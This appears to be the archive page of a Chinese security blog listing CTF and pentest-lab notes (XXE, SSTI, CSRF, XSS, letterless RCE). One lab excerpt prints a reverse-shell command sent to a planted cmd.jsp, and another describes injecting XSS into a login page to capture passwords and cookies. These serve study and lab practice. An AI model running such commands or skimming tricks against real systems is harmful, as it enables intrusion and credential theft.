AU9U5T's blog
  • Home
  • Archives
  • Categories
  • Tags
  • About

XML外部实体注入

XML基础相比于HTML的展示性语言,XML是和JSON是同一类,XML可以用于传输大量的数据,json大量数据的定义不如XML 通过自定义标签对数据进行组织 123456789<?xml version="1.0" encoding="UTF-8"?> #<!--XML 声明--><girls> <girl>
2024-05-10
#web

preg_replace函数分析

函数简绍这个函数用于php 替换文本 函数的原型是 1preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed 意思就是将$subject 中的$pattern 替换成$replacement 但是特别的是在 $
2024-05-09
#CTF

flask

[HNCTF 2022 WEEK2]ez_SSTI0x00 模板注入 0x01 使用hackbar自带的 [NISACTF 2022]is secret0x00 这道题挺难的 使用的知识点 ssti flask rce 0x01 首先 查找一圈只发现了 使用的框架 通过目录扫描 发现了secret 目录 0x02 发现通过get 传参的方式给他说秘密 然后我就随便说了一个 每理解到,
2024-05-09
#CTF刷题记录

csrf

MindMaphttps://www.zhixi.com/view/4af8e25c 图片 大纲:csrf形成原因没有检测referer只检测了cookie 但是并没有检测随机值token对于请求参数是可以猜测得到的漏洞挖掘重点关注referer ,如果删了或者修改referer 还是可以访问成功,那么就是可行的修改密码,刷关注数,绑定邮箱等地 利用方法前提用户登录,保证cookie 有效
2024-05-09
#整理

flask

简介flask 是模板注入的一种,flask 使用的是jinjia2 模板引擎 题型session 伪造0x00 session 结构 session_data+timestamp+hash 我们就是需要通过获取hash 然后伪造这个session 通常情况下,我们伪造的身份应该是admin 或者是root 值得注意的是timestamp+session_data 一般都是base64 编码
2024-05-06
#CTF

php

[MoeCTF 2022]ezphp0x00 使用知识点 变量覆盖 0x01 源码分析 12345678910111213141516171819202122232425262728<?phphighlight_file('source.txt');echo "<br><br>";$flag = 'xxxxxxxx
2024-05-02
#CTF刷题记录

xss

xmindhttps://www.zhixi.com/view/f03dc04b 图片 大纲:XSS形成原因服务器没有对用户的输入做良好的过滤,以至于执行黑客的js 代码挖掘方法留意能将我们的输入展示出来的地方分类反射型xss这个多用于钓鱼存储型xss这种多用于博客,论坛,留言板当中,在发帖的过程中嵌入XSS攻击代码,帖子被目标服务器存储在数据库当中,当用户进行正常的额访问时,触发XSS代
2024-05-02
#整理

web权限维持

使用xss 既然已经获取了web 权限,可以尝试在某一个登录页面插入xss 代码 例如 登录就会访问?user&password? 这样的url 那么只要登陆就会将其 密码获取(表单截取),还有一种cookie截取
2024-04-29
#渗透

Metasploitable1

信息收集 端口信息收集 漏洞8180-tomcat 弱密码 上传war 包 1http://192.168.79.186:8180/cmd/cmd.jsp?cmd=/bin/sh -i >& /dev/tcp/192.168.79.137/19999 0>&1 发现不行,尝试使用nc 进行反弹shell 1http://192.168.79.18
2024-04-28
#靶场记录

无字母rce

异或^异或的规则是将两个数拿来异或的话,相同的话就为0,不相同就为1 在php中两个字符相异或之后还是字符,所以我们可以选择两个不是字母的字符进行异或从而得到我们需要的 使用 [HUBUCTF 2022 新生赛]HowToGetShell 举例 首先查看源码 1234567<?phpshow_source(__FILE__);$mess=$_POST['mess'];if
2024-04-27
#CTF
1…1011121314…36

Search

github 随笔
Views: Visitors: